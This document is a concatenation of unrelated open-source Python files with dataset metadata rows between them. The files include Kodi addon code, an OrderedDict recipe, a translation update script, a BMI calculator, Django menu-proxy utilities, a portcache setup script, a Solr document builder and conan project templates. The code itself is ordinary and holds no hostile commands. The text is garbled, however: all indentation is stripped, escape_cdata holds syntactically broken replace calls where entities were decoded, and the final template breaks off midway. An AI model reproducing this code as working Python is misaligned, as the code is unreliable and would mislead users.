label_temp = label_temp.replace('CINEMA','').replace('MOVIES','')
channel.title = channel.title.upper()
channel_temp = channel.title.replace(' ','').replace('_','').replace('HD','').replace('1','ONE').replace('2','TWO').replace('3','THREE').replace('4','FOUR').replace('5','FIVE').replace('6','SIX').replace('7','SEVEN').replace('8','EIGHT').replace('9','NINE').replace('0','ZERO').replace('SPORTS','SPORT').replace('|','').replace(':','').replace('(','').replace(')','').replace('=','')
if len(channel_temp) > 9:
channel_temp = channel_temp.replace('CINEMA','').replace('MOVIES','')
if (channel_temp in label_temp) or (label_temp in channel_temp):
matches.append((id, label, stream))
# Get entries from PVRchannels with channel name
import pvr
PVRchannels = pvr.getPVRChannels()
if PVRchannels:
id = 'xbmc.pvr'
for (label, stream) in PVRchannels:
label = label.upper()
label_temp = label.replace(' ','').replace('_','').replace('HD','').replace('1','ONE').replace('2','TWO').replace('3','THREE').replace('4','FOUR').replace('5','FIVE').replace('6','SIX').replace('7','SEVEN').replace('8','EIGHT').replace('9','NINE').replace('0','ZERO').replace('SPORTS','SPORT').replace('|','').replace(':','').replace('(','').replace(')','').replace('=','')
if len(label_temp) > 9:
label_temp = label_temp.replace('CINEMA','').replace('MOVIES','')
channel.title = channel.title.upper()
channel_temp = channel.title.replace(' ','').replace('_','').replace('HD','').replace('1','ONE').replace('2','TWO').replace('3','THREE').replace('4','FOUR').replace('5','FIVE').replace('6','SIX').replace('7','SEVEN').replace('8','EIGHT').replace('9','NINE').replace('0','ZERO').replace('SPORTS','SPORT').replace('|','').replace(':','').replace('(','').replace(')','').replace('=','')
if len(channel_temp) > 9:
channel_temp = channel_temp.replace('CINEMA','').replace('MOVIES','')
if (channel_temp in label_temp) or (label_temp in channel_temp):
matches.append((id, label, stream))
xbmc.log('### matches length: %s' % len(matches))
# if len(matches) == 1:
# return [matches[0][0],matches[0][1],str(matches[0][2])]
# else:
return matches
class OrderedDict(dict):
# From: http://code.activestate.com/recipes/576693/
'Dictionary that remembers insertion order'
# An inherited dict maps keys to values.
# The inherited dict provides __getitem__, __len__, __contains__, and get.
# The remaining methods are order-aware.
# Big-O running times for all methods are the same as for regular dictionaries.
# The internal self.__map dictionary maps keys to links in a doubly linked list.
# The circular doubly linked list starts and ends with a sentinel element.
# The sentinel element never gets deleted (this simplifies the algorithm).
# Each link is stored as a list of length three: [PREV, NEXT, KEY].
def __init__(self, *args, **kwds):
'''Initialize an ordered dictionary. Signature is the same as for
regular dictionaries, but keyword arguments are not recommended
because their insertion order is arbitrary.
'''
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__root
except AttributeError:
self.__root = root = [] # sentinel node
root[:] = [root, root, None]
self.__map = {}
self.__update(*args, **kwds)
def __setitem__(self, key, value, dict_setitem=dict.__setitem__):
'od.__setitem__(i, y) <==> od[i]=y'
# Setting a new item creates a new link which goes at the end of the linked
# list, and the inherited dictionary is updated with the new key/value pair.
if key not in self:
root = self.__root
last = root[0]
last[1] = root[0] = self.__map[key] = [last, root, key]
dict_setitem(self, key, value)
def __delitem__(self, key, dict_delitem=dict.__delitem__):
'od.__delitem__(y) <==> del od[y]'
# Deleting an existing item uses self.__map to find the link which is
# then removed by updating the links in the predecessor and successor nodes.
dict_delitem(self, key)
link_prev, link_next, key = self.__map.pop(key)
link_prev[1] = link_next
link_next[0] = link_prev
def __iter__(self):
'od.__iter__() <==> iter(od)'
root = self.__root
curr = root[1]
while curr is not root:
yield curr[2]
curr = curr[1]
def __reversed__(self):
'od.__reversed__() <==> reversed(od)'
root = self.__root
curr = root[0]
while curr is not root:
yield curr[2]
curr = curr[0]
def clear(self):
'od.clear() -> None. Remove all items from od.'
try:
for node in self.__map.itervalues():
del node[:]
root = self.__root
root[:] = [root, root, None]
self.__map.clear()
except AttributeError:
pass
dict.clear(self)
def popitem(self, last=True):
'''od.popitem() -> (k, v), return and remove a (key, value) pair.
Pairs are returned in LIFO order if last is true or FIFO order if false.
'''
if not self:
raise KeyError('dictionary is empty')
root = self.__root
if last:
link = root[0]
link_prev = link[0]
link_prev[1] = root
root[0] = link_prev
else:
link = root[1]
link_next = link[1]
root[1] = link_next
link_next[0] = root
key = link[2]
del self.__map[key]
value = dict.pop(self, key)
return key, value
# -- the following methods do not depend on the internal structure --
def keys(self):
'od.keys() -> list of keys in od'
return list(self)
def values(self):
'od.values() -> list of values in od'
return [self[key] for key in self]
def items(self):
'od.items() -> list of (key, value) pairs in od'
return [(key, self[key]) for key in self]
def iterkeys(self):
'od.iterkeys() -> an iterator over the keys in od'
return iter(self)
def itervalues(self):
'od.itervalues -> an iterator over the values in od'
for k in self:
yield self[k]
def iteritems(self):
'od.iteritems -> an iterator over the (key, value) items in od'
for k in self:
yield (k, self[k])
def update(*args, **kwds):
'''od.update(E, **F) -> None. Update od from dict/iterable E and F.
If E is a dict instance, does: for k in E: od[k] = E[k]
If E has a .keys() method, does: for k in E.keys(): od[k] = E[k]
Or if E is an iterable of items, does: for k, v in E: od[k] = v
In either case, this is followed by: for k, v in F.items(): od[k] = v
'''
if len(args) > 2:
raise TypeError('update() takes at most 2 positional '
'arguments (%d given)' % (len(args),))
elif not args:
raise TypeError('update() takes at least 1 argument (0 given)')
self = args[0]
# Make progressively weaker assumptions about "other"
other = ()
if len(args) == 2:
other = args[1]
if isinstance(other, dict):
for key in other:
self[key] = other[key]
elif hasattr(other, 'keys'):
for key in other.keys():
self[key] = other[key]
else:
for key, value in other:
self[key] = value
for key, value in kwds.items():
self[key] = value
__update = update # let subclasses override update without breaking __init__
__marker = object()
def pop(self, key, default=__marker):
'''od.pop(k[,d]) -> v, remove specified key and return the corresponding value.
If key is not found, d is returned if given, otherwise KeyError is raised.
'''
if key in self:
result = self[key]
del self[key]
return result
if default is self.__marker:
raise KeyError(key)
return default
def setdefault(self, key, default=None):
'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od'
if key in self:
return self[key]
self[key] = default
return default
def __repr__(self, _repr_running={}):
'od.__repr__() <==> repr(od)'
call_key = id(self), _get_ident()
if call_key in _repr_running:
return '...'
_repr_running[call_key] = 1
try:
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
finally:
del _repr_running[call_key]
def __reduce__(self):
'Return state information for pickling'
items = [[k, self[k]] for k in self]
inst_dict = vars(self).copy()
for k in vars(OrderedDict()):
inst_dict.pop(k, None)
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def copy(self):
'od.copy() -> a shallow copy of od'
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
'''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S
and values equal to v (which defaults to None).
'''
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
'''od.__eq__(y) <==> od==y. Comparison to another OD is order-sensitive
while comparison to a regular mapping is order-insensitive.
'''
if isinstance(other, OrderedDict):
return len(self)==len(other) and self.items() == other.items()
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
| gpl-2.0 | 8,102,808,333,039,620,000 | 40.849153 | 403 | 0.507108 | false | 4.081832 | false | false | false |
moorecoin/MooreCoinMiningAlgorithm | contrib/devtools/update-translations.py | 1 | 6779 | #!/usr/bin/python
# Copyright (c) 2014 Wladimir J. van der Laan
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Run this script from the root of the repository to update all translations from
Transifex.
It will do the following automatically:
- fetch all translations using the tx tool
- post-process them into valid and committable format
  - remove invalid control characters
  - remove location tags (makes diffs less noisy)
TODO:
- auto-add new translations to the build system according to the translation process
'''
from __future__ import division, print_function
import subprocess
import re
import sys
import os
import io
import xml.etree.ElementTree as et
# name of transifex tool
tx = 'tx'
# name of source language file
source_lang = 'moorecoin_en.ts'
# directory with locale files
locale_dir = 'src/qt/locale'
def check_at_repository_root():
if not os.path.exists('.git'):
print('no .git directory found')
print('execute this script at the root of the repository', file=sys.stderr)
exit(1)
def fetch_all_translations():
if subprocess.call([tx, 'pull', '-f']):
print('error while fetching translations', file=sys.stderr)
exit(1)
def find_format_specifiers(s):
'''find all format specifiers in a string.'''
pos = 0
specifiers = []
    while True:
percent = s.find('%', pos)
if percent < 0:
break
specifiers.append(s[percent+1])
pos = percent+2
return specifiers
def split_format_specifiers(specifiers):
'''split format specifiers between numeric (qt) and others (strprintf)'''
numeric = []
other = []
for s in specifiers:
if s in {'1','2','3','4','5','6','7','8','9'}:
numeric.append(s)
else:
other.append(s)
# numeric (qt) can be present in any order, others (strprintf) must be in specified order
return set(numeric),other
def sanitize_string(s):
'''sanitize string for printing'''
return s.replace('\n',' ')
def check_format_specifiers(source, translation, errors):
source_f = split_format_specifiers(find_format_specifiers(source))
# assert that no source messages contain both qt and strprintf format specifiers
# if this fails, go change the source as this is hacky and confusing!
assert(not(source_f[0] and source_f[1]))
try:
translation_f = split_format_specifiers(find_format_specifiers(translation))
    except IndexError:
        errors.append("parse error in translation '%s'" % sanitize_string(translation))
        return False
    else:
        if source_f != translation_f:
            errors.append("mismatch between '%s' and '%s'" % (sanitize_string(source), sanitize_string(translation)))
            return False
    return True
def all_ts_files(suffix=''):
for filename in os.listdir(locale_dir):
# process only language files, and do not process source language
if not filename.endswith('.ts'+suffix) or filename == source_lang+suffix:
continue
if suffix: # remove provided suffix
filename = filename[0:-len(suffix)]
filepath = os.path.join(locale_dir, filename)
yield(filename, filepath)
fix_re = re.compile(b'[\x00-\x09\x0b\x0c\x0e-\x1f]')
def remove_invalid_characters(s):
'''remove invalid characters from translation string'''
return fix_re.sub(b'', s)
# override cdata escape function to make our output match qt's (optional, just for cleaner diffs for
# comparison, disable by default)
_orig_escape_cdata = None
def escape_cdata(text):
text = _orig_escape_cdata(text)
text = text.replace("'", ''')
text = text.replace('"', '"')
return text
def postprocess_translations(reduce_diff_hacks=False):
print('checking and postprocessing...')
if reduce_diff_hacks:
global _orig_escape_cdata
_orig_escape_cdata = et._escape_cdata
et._escape_cdata = escape_cdata
for (filename,filepath) in all_ts_files():
os.rename(filepath, filepath+'.orig')
    have_errors = False
for (filename,filepath) in all_ts_files('.orig'):
# pre-fixups to cope with transifex output
        parser = et.XMLParser(encoding='utf-8') # need to override encoding because 'utf8' is not understood only 'utf-8'
with open(filepath + '.orig', 'rb') as f:
data = f.read()
# remove control characters; this must be done over the entire file otherwise the xml parser will fail
data = remove_invalid_characters(data)
        tree = et.parse(io.BytesIO(data), parser=parser)
# iterate over all messages in file
root = tree.getroot()
for context in root.findall('context'):
for message in context.findall('message'):
numerus = message.get('numerus') == 'yes'
source = message.find('source').text
translation_node = message.find('translation')
# pick all numerusforms
if numerus:
translations = [i.text for i in translation_node.findall('numerusform')]
else:
translations = [translation_node.text]
for translation in translations:
                    if translation is None:
continue
errors = []
valid = check_format_specifiers(source, translation, errors)
for error in errors:
print('%s: %s' % (filename, error))
if not valid: # set type to unfinished and clear string if invalid
translation_node.clear()
translation_node.set('type', 'unfinished')
                        have_errors = True
# remove location tags
for location in message.findall('location'):
message.remove(location)
# remove entire message if it is an unfinished translation
if translation_node.get('type') == 'unfinished':
context.remove(message)
# write fixed-up tree
# if diff reduction requested, replace some xml to 'sanitize' to qt formatting
if reduce_diff_hacks:
        out = io.BytesIO()
tree.write(out, encoding='utf-8')
out = out.getvalue()
out = out.replace(b' />', b'/>')
with open(filepath, 'wb') as f:
f.write(out)
else:
tree.write(filepath, encoding='utf-8')
return have_errors
if __name__ == '__main__':
check_at_repository_root()
fetch_all_translations()
postprocess_translations()
| mit | -6,915,173,566,015,647,000 | 35.446237 | 121 | 0.618675 | false | 4.169127 | false | false | false |
kssim/efp | making_decisions/python/bmi_calculator.py | 1 | 1254 | # Pratice 19. BMI Calculator
# Output:
# Your BMI is 19.5.
# You are within the ideal weight range.
# Or
# Your BMI is 32.5.
# You are overweight. You should see your doctor.
# Formula:
# bmi = (weight / (height x height)) x 703
# Standard:
#   BMI 18.5 ~ 25 is normal weight.
# Constraint:
# - Ensure your program takes only numeric data.
# Don't let the user continue unless the data is valid.
#!/usr/bin/env python
from __future__ import division
import sys
def input_process(in_question):
return input(in_question) if sys.version_info >= (3,0) else raw_input(in_question)
if __name__ == '__main__':
try:
weight = int(input_process('What is your weight(pound)? '))
height = int(input_process('What is your height(inch)? '))
except:
print ('You must input only numbers.')
else:
bmi_convert_value = 703
bmi_raw_data = float(weight / (height * height))
bmi = bmi_raw_data * bmi_convert_value
print ('Your BMI is %s' % bmi)
        if bmi < 18.5:
            print ('You are underweight. You should see your doctor.')
        elif bmi > 25:
            print ('You are overweight. You should see your doctor.')
        else:
            print ('You are within the ideal weight range.')
| mit | -8,714,691,810,336,679,000 | 28.162791 | 86 | 0.606858 | false | 3.352941 | false | false | false |
redsolution/django-menu-proxy | menuproxy/utils.py | 1 | 10086 | # -*- coding: utf-8 -*-
from django import conf
from django.core.cache import cache
from importpath import importpath
METHODS = (
    'replace', # Indicates that the point object should be replaced with object
    'insert', # Indicates that object should be added to the list of children of the inside rule
    'children', # Indicates that the children of object should be added to the list of children of the inside rule
)
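# Illustrative sketch (documentation only, unused): the shape of a
# MENU_PROXY_RULES entry in settings.py as consumed by get_rules() below.
# Every dotted path here is a hypothetical placeholder, not a real module.
_EXAMPLE_MENU_PROXY_RULES = [
    {
        'name': 'pages',
        'method': 'replace',
        'proxy': 'myproject.menu.PagesProxy',
        'model': 'pages.models.Page',
    },
    {
        'name': 'news',
        'method': 'insert',
        'inside': 'pages',
        'point': 'myproject.menu.get_news_mount_point',
        'proxy': 'myproject.menu.NewsProxy',
    },
]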
def get_title(menu_proxy, object):
"""Correct value returned by menu_proxy.title function"""
result = menu_proxy.title(object)
if result is None:
return u''
return unicode(result)
def get_url(menu_proxy, object):
"""Correct value returned by menu_proxy.url function"""
result = menu_proxy.url(object)
if result is None:
return u''
return unicode(result)
def get_ancestors(menu_proxy, object):
"""Correct value returned by menu_proxy.ancestors function"""
result = menu_proxy.ancestors(object)
if result is None:
return []
return [value for value in result]
def get_children(menu_proxy, object, lasy):
"""
Call ``children`` or ``lasy_children`` function for ``menu_proxy``.
Pass to it ``object``.
Correct result.
"""
if lasy:
result = menu_proxy.lasy_children(object)
else:
result = menu_proxy.children(object)
if result is None:
return []
return [value for value in result]
class DoesNotDefined(object):
"""
    Class to indicate that a value was not present in the rule.
"""
pass
def try_to_import(value, exception_text):
"""
If ``value`` is not None and is not DoesNotDefined
then try to import specified by ``value`` path.
"""
if value is not DoesNotDefined and value is not None:
return importpath(value, exception_text)
return value
def get_rules():
"""Return dictionary of rules with settings"""
rules = cache.get('menuproxy.rules', None)
if rules is not None:
return rules
rules = {}
sequence = {None: []}
def add_to_sequence(rule, value):
if rule not in sequence:
sequence[rule] = []
sequence[rule].append(value)
rules[None] = MenuRule(name=None, method='replace', proxy=None, rules=rules)
for kwargs in getattr(conf.settings, 'MENU_PROXY_RULES', []):
rule = MenuRule(rules=rules, **kwargs)
rules[rule.name] = rule
add_to_sequence(rule.name, rule.name)
add_to_sequence(rule.inside, rule.name)
for name, rule in rules.iteritems():
rule.sequence = [rules[item] for item in sequence[name]]
cache.set('menuproxy.rules', rules)
return rules
def get_front_page(rules):
"""If MENU_PROXY_FRONT_PAGED is True and there is front page return MenuItem for it"""
front_page = cache.get('menuproxy.front_page', DoesNotDefined)
if front_page is not DoesNotDefined:
return front_page
front_page = None
if getattr(conf.settings, 'MENU_PROXY_FRONT_PAGED', True):
root = MenuItem(None, DoesNotDefined)
children = root.children(False)
if children:
front_page = children[0]
cache.set('menuproxy.front_page', front_page)
return front_page
class MenuRule(object):
"""Rule"""
def __init__(self, name, method, proxy, rules, inside=None,
model=DoesNotDefined, point=DoesNotDefined, object=DoesNotDefined,
point_function=DoesNotDefined, object_function=DoesNotDefined, **other):
self.name = name
self.method = method
        assert self.method in METHODS, 'menuproxy does not support method: %s' % self.method
self.inside = inside
self.model = try_to_import(model, 'model class')
self.point = try_to_import(point, 'mount point')
if callable(self.point) and self.point is not DoesNotDefined:
self.point = self.point()
if self.point is DoesNotDefined:
self.point_function = try_to_import(point_function, 'mount point function')
else:
self.point_function = DoesNotDefined
self.object = try_to_import(object, 'mount object')
if callable(self.object) and self.object is not DoesNotDefined:
self.object = self.object()
if self.object is DoesNotDefined:
self.object_function = try_to_import(object_function, 'mount object function')
else:
self.object_function = DoesNotDefined
self.proxy = try_to_import(proxy, 'MenuProxy class')
other.update(self.__dict__)
if callable(self.proxy) and self.proxy is not DoesNotDefined:
self.proxy = self.proxy(**other)
self.rules = rules
self.sequence = []
def _get_point(self, object, forward):
if self.point is not DoesNotDefined:
return self.point
elif self.point_function is not DoesNotDefined:
return self.point_function(object, forward)
else:
return DoesNotDefined
def _get_object(self, object, forward):
if self.object is not DoesNotDefined:
return self.object
elif self.object_function is not DoesNotDefined:
return self.object_function(object, forward)
else:
return DoesNotDefined
def forward_point(self, object):
return self._get_point(object, True)
def backward_point(self, object):
return self._get_point(object, False)
def forward_object(self, object):
return self._get_object(object, True)
def backward_object(self, object):
return self._get_object(object, False)
class MenuItem(object):
"""Objects of this class will be send to templates. Class provide to walk through nested rules"""
active = False
current = False
def __init__(self, name=None, object=None):
if isinstance(object, MenuItem):
self.rules = object.rules
self.name, self.object = object.name, object.object
else:
self.rules = get_rules()
for rule in self.rules[name].sequence:
if rule.name != name and rule.method == 'replace':
point = rule.forward_point(object)
if point is DoesNotDefined or point == object:
self.name, self.object = rule.name, rule.forward_object(object)
break
else:
self.name, self.object = name, object
self.front_paged_ancestors = False
def title(self):
"""Returns title for object"""
if hasattr(self, '_title'):
return getattr(self, '_title')
title = get_title(self.rules[self.name].proxy, self.object)
setattr(self, '_title', title)
return title
def url(self):
"""Returns url for object"""
if hasattr(self, '_url'):
return getattr(self, '_url')
url = get_url(self.rules[self.name].proxy, self.object)
setattr(self, '_url', url)
return url
def ancestors(self):
"""Returns ancestors for object, started from top level"""
if hasattr(self, '_ancestors'):
return getattr(self, '_ancestors')
ancestors = []
name = self.name
object = self.object
while True:
items = get_ancestors(self.rules[name].proxy, object)
until = self.rules[name].backward_object(object)
items.reverse()
for item in items:
ancestors.insert(0, MenuItem(name, item))
if item == until:
break
method, object, name = self.rules[name].method, self.rules[name].backward_point(object), self.rules[name].inside
if name is None:
break
if method != 'replace':
ancestors.insert(0, MenuItem(name, object))
front_page = get_front_page(self.rules)
if front_page is not None:
if not ancestors or ancestors[0].object != front_page.object:
if (front_page.name, front_page.object) != (self.name, self.object):
self.front_paged_ancestors = True
ancestors.insert(0, front_page)
setattr(self, '_ancestors', ancestors)
return ancestors
def ancestors_for_menu(self):
"""
Returns ancestors for show_menu tags.
Ancestors will not contain front page and will contain object itself.
"""
ancestors = self.ancestors()
if self.front_paged_ancestors:
ancestors = ancestors[1:]
else:
ancestors = ancestors[:]
ancestors.append(self)
return ancestors
def children(self, lasy=False):
"""Returns children for object"""
if lasy:
field_name = '_children_lasy'
else:
field_name = '_children'
if hasattr(self, field_name):
return getattr(self, field_name)
children = []
for rule in self.rules[self.name].sequence:
point = rule.forward_point(self.object)
if rule.name == self.name:
children += [MenuItem(self.name, item) for item in get_children(
self.rules[self.name].proxy, self.object, lasy)
]
elif point is DoesNotDefined or point == self.object:
object = rule.forward_object(self.object)
if rule.method == 'insert' and not lasy:
children += [MenuItem(rule.name, object)]
elif rule.method == 'children':
children += [MenuItem(rule.name, item) for item in get_children(
rule.proxy, object, lasy)
]
setattr(self, field_name, children)
return children
| gpl-3.0 | 7,323,693,844,569,859,000 | 35.032727 | 124 | 0.598345 | false | 3.919699 | false | false | false |
oneraghavan/portcache | setup.py | 1 | 2150 | from setuptools import setup
setup(name='portcache',
      version='0.3',
description='A simple cache for port from remote service',
url='https://github.com/oneraghavan/portcache',
author='Raghavan',
author_email='[email protected]',
license='MIT',
packages=['portcache'],
install_requires=[
'web.py', 'PyYAML' , 'requests'
],
zip_safe=False,
entry_points={
'console_scripts': ['portcache=portcache.command_line:main'],
})
print "___________________________________"
print "|@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ |"
print "|@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ |"
print "| Succesfully installed portcache |"
print "|@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ |"
print "|@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ |"
print "|_________________________________|"
print "\nportcache is a cache for remote calls . In microservices world, we have to work with lots of services which are needed to run our service and \n" \
"its a pain if the list of these service list grows big .portcache gives you the ability to point to a remote service instance and also cache \n" \
"the responses for you calls.\n\n" \
"To start : portcache <config yml file> \n\n" \
"The config file requires three params localport , remote , cache_file .\n" \
"localport - The port you want to run your cache service . you will point your dependent app/service to this port \n" \
"remote - The remote url with port that corresponds to the service you would like to cache \n" \
"cache_file - The location of the cache you want to save \n\n" \
"A sample config yml file looks like this \n\n" \
"localport: 9090 \n" \
"remote: http://myremoteserviceurl.com \n" \
"cache_file: \"/data/tmp/merch \n\n" \
"Starting with this config file, starts a server at port 9090.Whenever a request comes to the localhost:9090, it \n" \
"will check if this request has been already cached ,if yes then it will serve from cache file, else it will call \n" \
"the http://myremoteserviceurl.com with the request, cache and return the response"
| mit | 51,269,814,623,588,696 | 50.190476 | 156 | 0.596279 | false | 3.758741 | false | false | false |
phil65/KodiDevKit | script.py | 1 | 3245 | # -*- coding: utf8 -*-
# Copyright (C) 2017 - Philipp Temminghoff <[email protected]>
# This program is Free Software see LICENSE file for details
import os
import sys
import codecs
import logging
RESULTS_FILE = "results.txt"
settings = {"kodi_path": "C:/Kodi",
"portable_mode": True,
"language_folders": ["resource.language.en_gb", "English"]}
def check_tags(check_type):
"""
    triggers a check of type "check_type", then formats and logs the results
"""
errors = INFOS.get_check_listitems(check_type)
for e in errors:
logging.info(e["message"])
path = "/".join(e["file"].split(os.sep)[-2:])
logging.info("%s: line %s\n" % (path, e["line"]))
if __name__ == "__main__":
from libs import utils
from libs.infoprovider import InfoProvider
from libs import chardet
from libs.eol import eol
INFOS = InfoProvider()
open(RESULTS_FILE, 'w').close()
INFOS.load_settings(settings)
INFOS.load_data()
filehandler = logging.FileHandler("result.txt", mode="w")
formatter = logging.Formatter('%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
filehandler.setFormatter(formatter)
logger = logging.getLogger()
logger.addHandler(filehandler)
project_folder = sys.argv[1] if len(sys.argv) >= 2 else input("Enter Path to skin: ")
INFOS.init_addon(project_folder)
if len(sys.argv) < 3:
repo = input('Enter Kodi version (%s): ' % " / ".join([item["name"] for item in INFOS.addon.RELEASES]))
else:
repo = sys.argv[2]
INFOS.check_xml_files()
for path in INFOS.addon.get_xml_files():
if utils.check_bom(path):
logging.info("found BOM. File: " + path)
try:
with codecs.open(path, "rb", encoding='utf-8', errors="strict") as f:
text = f.read()
except Exception:
logging.info("Error when trying to read %s as UTF-8" % path)
with codecs.open(path, "rb", errors="ignore") as f:
rawdata = f.read()
encoding = chardet.detect(rawdata)
logging.info("detected encoding: %s" % encoding["encoding"])
with codecs.open(path, "rb", encoding=encoding["encoding"]) as f:
text = f.read()
result = eol.eol_info_from_path_patterns([project_folder],
recursive=True,
includes=[],
excludes=['.svn', '.git'])
for item in result:
        if item[1] == '\n' or item[1] is None:
continue
elif item[1] == '\r':
logging.info("MAC Line Endings detected in " + item[0])
else:
logging.info("Windows Line Endings detected in " + item[0])
logging.info("ADDON DEPENDENCY CHECK")
INFOS.check_dependencies()
logging.info("INCLUDE CHECK")
check_tags("include")
logging.info("VARIABLE CHECK")
check_tags("variable")
logging.info("FONT CHECK")
check_tags("font")
logging.info("LABEL CHECK")
check_tags("label")
logging.info("ID CHECK")
check_tags("id")
logging.info("CHECK FOR COMMON MISTAKES")
check_tags("general")
| gpl-3.0 | -1,780,904,815,994,852,400 | 35.460674 | 111 | 0.572265 | false | 3.747113 | false | false | false |
seecr/meresco-solr | meresco/solr/fields2solrdoc.py | 1 | 2921 | ## begin license ##
#
# "Meresco Solr" is a set of components and tools
# to integrate Solr into "Meresco."
#
# Copyright (C) 2011-2013 Seecr (Seek You Too B.V.) http://seecr.nl
# Copyright (C) 2012 SURF http://www.surf.nl
# Copyright (C) 2012-2013 Stichting Kennisnet http://www.kennisnet.nl
#
# This file is part of "Meresco Solr"
#
# "Meresco Solr" is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# "Meresco Solr" is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with "Meresco Solr"; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
## end license ##
from meresco.core import Observable
from xml.sax.saxutils import escape as escapeXml
from itertools import chain
class Fields2SolrDoc(Observable):
def __init__(self, transactionName, partname="solr", singularValueFields=None, isSingularValueField=None):
Observable.__init__(self)
self._transactionName = transactionName
self._partname = partname
if singularValueFields and isSingularValueField:
raise ValueError("Use either 'singularValueFields' or 'isSingularValueField'")
self._isSingularValueField = isSingularValueField
if singularValueFields:
singularValueFields = set(singularValueFields)
self._isSingularValueField = lambda name: name in singularValueFields
def begin(self, name):
if name != self._transactionName:
return
tx = self.ctx.tx
tx.join(self)
def addField(self, name, value):
tx = self.ctx.tx
valueList = tx.objectScope(self).setdefault(name, [])
if not self._isSingularValueField is None:
if len(valueList) == 1 and self._isSingularValueField(name):
return
valueList.append(value)
def commit(self, id):
tx = self.ctx.tx
fields = tx.objectScope(self)
if not fields:
return
recordIdentifier = tx.locals["id"]
specialFields = [
('__id__', recordIdentifier),
]
def fieldStatement(key, value):
return '<field name="%s">%s</field>' % (escapeXml(key), escapeXml(value))
allFields = ((k, v) for k, vs in fields.items() for v in vs)
xml = "<doc xmlns=''>%s</doc>" % ''.join(fieldStatement(*args) for args in chain(iter(specialFields), allFields))
yield self.all.add(identifier=recordIdentifier, partname=self._partname, data=xml)
| gpl-2.0 | 5,766,375,609,882,647,000 | 40.140845 | 121 | 0.6734 | false | 3.808344 | false | false | false |
lasote/conan | conans/client/cmd/new.py | 1 | 9249 | import re
from conans.errors import ConanException
from conans.model.ref import ConanFileReference
from conans.client.cmd.new_ci import ci_get_files
conanfile = """from conans import ConanFile, CMake, tools
class {package_name}Conan(ConanFile):
name = "{name}"
version = "{version}"
license = "<Put the package license here>"
url = "<Package recipe repository url here, for issues about the package>"
description = "<Description of {package_name} here>"
settings = "os", "compiler", "build_type", "arch"
options = {{"shared": [True, False]}}
default_options = "shared=False"
generators = "cmake"
def source(self):
self.run("git clone https://github.com/memsharded/hello.git")
self.run("cd hello && git checkout static_shared")
# This small hack might be useful to guarantee proper /MT /MD linkage in MSVC
# if the packaged project doesn't have variables to set it properly
tools.replace_in_file("hello/CMakeLists.txt", "PROJECT(MyHello)", '''PROJECT(MyHello)
include(${{CMAKE_BINARY_DIR}}/conanbuildinfo.cmake)
conan_basic_setup()''')
def build(self):
cmake = CMake(self)
cmake.configure(source_dir="%s/hello" % self.source_folder)
cmake.build()
# Explicit way:
# self.run('cmake %s/hello %s' % (self.source_folder, cmake.command_line))
# self.run("cmake --build . %s" % cmake.build_config)
def package(self):
self.copy("*.h", dst="include", src="hello")
self.copy("*hello.lib", dst="lib", keep_path=False)
self.copy("*.dll", dst="bin", keep_path=False)
self.copy("*.so", dst="lib", keep_path=False)
self.copy("*.dylib", dst="lib", keep_path=False)
self.copy("*.a", dst="lib", keep_path=False)
def package_info(self):
self.cpp_info.libs = ["hello"]
"""
conanfile_bare = """from conans import ConanFile
from conans import tools
class {package_name}Conan(ConanFile):
name = "{name}"
version = "{version}"
settings = "os", "compiler", "build_type", "arch"
description = "<Description of {package_name} here>"
url = "None"
license = "None"
def package(self):
self.copy("*")
def package_info(self):
self.cpp_info.libs = tools.collect_libs(self)
"""
conanfile_sources = """from conans import ConanFile, CMake
class {package_name}Conan(ConanFile):
name = "{name}"
version = "{version}"
license = "<Put the package license here>"
url = "<Package recipe repository url here, for issues about the package>"
description = "<Description of {package_name} here>"
settings = "os", "compiler", "build_type", "arch"
options = {{"shared": [True, False]}}
default_options = "shared=False"
generators = "cmake"
exports_sources = "src/*"
def build(self):
cmake = CMake(self)
cmake.configure(source_dir="%s/src" % self.source_folder)
cmake.build()
# Explicit way:
# self.run('cmake %s/src %s' % (self.source_folder, cmake.command_line))
# self.run("cmake --build . %s" % cmake.build_config)
def package(self):
self.copy("*.h", dst="include", src="src")
self.copy("*.lib", dst="lib", keep_path=False)
self.copy("*.dll", dst="bin", keep_path=False)
self.copy("*.dylib*", dst="lib", keep_path=False)
self.copy("*.so", dst="lib", keep_path=False)
self.copy("*.a", dst="lib", keep_path=False)
def package_info(self):
self.cpp_info.libs = ["hello"]
"""
conanfile_header = """from conans import ConanFile, tools
import os
class {package_name}Conan(ConanFile):
name = "{name}"
version = "{version}"
license = "<Put the package license here>"
url = "<Package recipe repository url here, for issues about the package>"
description = "<Description of {package_name} here>"
# No settings/options are necessary, this is header only
def source(self):
'''retrieval of the source code here. Remember you can also put the code in the folder and
use exports instead of retrieving it with this source() method
'''
#self.run("git clone ...") or
#tools.download("url", "file.zip")
#tools.unzip("file.zip" )
def package(self):
self.copy("*.h", "include")
"""
test_conanfile = """from conans import ConanFile, CMake
import os
class {package_name}TestConan(ConanFile):
settings = "os", "compiler", "build_type", "arch"
generators = "cmake"
def build(self):
cmake = CMake(self)
# Current dir is "test_package/build/<build_id>" and CMakeLists.txt is in "test_package"
cmake.configure(source_dir=self.conanfile_directory, build_dir="./")
cmake.build()
